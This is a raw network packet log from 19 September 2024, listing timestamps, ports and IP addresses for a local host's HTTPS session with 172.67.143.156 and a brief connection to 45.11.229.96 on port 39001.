Sep 19, 2024 02:25:21.146300077 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.146311045 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.146325111 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.146353006 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.146872997 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.146933079 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.146945000 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.146956921 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.146991968 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.147043943 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.147084951 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.147103071 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.147108078 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.147126913 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.148688078 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.148732901 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.148744106 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.148758888 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.148787022 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.148874044 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.148941994 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.148947001 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.148992062 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.149036884 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.149066925 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.149070978 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.149091005 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.149272919 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.149311066 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.149333000 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.149354935 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.179944038 CEST	49718	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:21.184725046 CEST	39001	49718	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:21.184799910 CEST	49718	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:21.189618111 CEST	39001	49718	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:21.208115101 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.208127022 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.208175898 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.208838940 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.208843946 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.208862066 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.208942890 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.208946943 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.208956957 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.208969116 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209043026 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.209048033 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209053040 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209096909 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209101915 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.209120989 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209172964 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209223032 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.209238052 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209249973 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.209299088 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209312916 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.209322929 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209351063 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.209367037 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.209367990 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209391117 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209413052 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.209429026 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209435940 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.209449053 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209475040 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.209485054 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.209496021 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.209523916 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.212440014 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.212445021 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.212481976 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.212555885 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.212568998 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.212605000 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.212651014 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.212692976 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.212701082 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.212747097 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.212785959 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.212901115 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.212901115 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.212917089 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.212970972 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.213973045 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.213977098 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.214003086 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.214032888 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.214056015 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.214099884 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.214114904 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.214170933 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.214234114 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.215837955 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.215840101 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.216000080 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.216447115 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.217710018 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.272999048 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273017883 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273060083 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.273067951 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273101091 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.273202896 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273216009 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273252010 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.273257017 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273358107 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273377895 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273406982 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.273411989 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273425102 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.273442984 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.273535967 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273549080 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273595095 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.273598909 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273740053 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273757935 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273786068 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.273788929 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273816109 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.273833990 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.273983002 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.273996115 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.274034977 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.274038076 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.274054050 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.274068117 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.274519920 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.274533987 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.274563074 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.274566889 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.274586916 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.274602890 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.274796963 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.274811029 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.274840117 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.274842978 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.274873972 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.274873972 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.356137991 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.360004902 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360023975 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360057116 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.360063076 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360110998 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.360131025 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360146046 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360203028 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.360203028 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.360208035 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360394955 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360414028 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360438108 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.360441923 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360457897 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.360483885 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.360541105 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360557079 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360585928 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.360589027 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360608101 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.360620975 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.360722065 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360738039 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360774994 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.360779047 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360939026 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360955000 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360980034 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.360982895 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.360996962 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.361021996 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.361233950 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.361248016 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.361277103 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.361279964 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.361293077 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.361316919 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.361490965 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.361505032 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.361541986 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.361546040 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.362076044 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.446978092 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447031975 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447055101 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.447063923 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447113991 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.447180033 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447233915 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447248936 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.447253942 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447284937 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.447422981 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447467089 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447478056 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.447494984 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447510958 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.447529078 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.447611094 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447652102 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447664022 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.447673082 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447700024 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.447711945 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.447772980 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447822094 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447824001 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.447844028 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.447870970 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.447891951 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.448044062 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.448088884 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.465598106 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.465606928 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.465730906 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.467180014 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.467184067 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.470504045 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.534095049 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534166098 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534184933 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.534194946 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534214020 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.534323931 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534377098 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534384012 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.534409046 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534427881 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.534548044 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534586906 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534600019 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.534621954 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534651995 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.534753084 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534796000 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534804106 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.534817934 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534854889 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.534941912 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534980059 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.534989119 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.535001040 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.535012007 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.535135031 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.535177946 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.535186052 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.535209894 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.535238981 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.535342932 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.535381079 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.535406113 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.535435915 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.535474062 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.535552025 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.535595894 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.535604954 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.535619974 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.535649061 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.620731115 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.620759964 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.620801926 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.620811939 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.620836020 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.620837927 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.620891094 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.620897055 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.620930910 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.620956898 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.621143103 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.621186018 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.621201992 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.621212959 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.621243000 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.621347904 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.621392965 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.621398926 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.621422052 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.621463060 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.621586084 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.621623039 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.621635914 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.621644020 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.621673107 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.621745110 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.621788979 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.621797085 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.621810913 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.621840954 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.621969938 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.622009039 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.622021914 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.622040033 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.622065067 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.622180939 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.622226954 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.622236013 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.622255087 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.622292042 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.688909054 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.707325935 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.707359076 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.707417011 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.707422972 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.707458973 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.707644939 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.707664013 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.707695007 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.707699060 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.707711935 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.707731962 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.707822084 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.707873106 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.707880020 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.707901001 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.707918882 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.707940102 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.708101988 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.708144903 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.708153009 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.708167076 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.708197117 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.708220005 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.708301067 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.708347082 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.708375931 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.708379984 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.708406925 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.708411932 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.708638906 CEST	443	49716	172.67.143.156	192.168.2.6
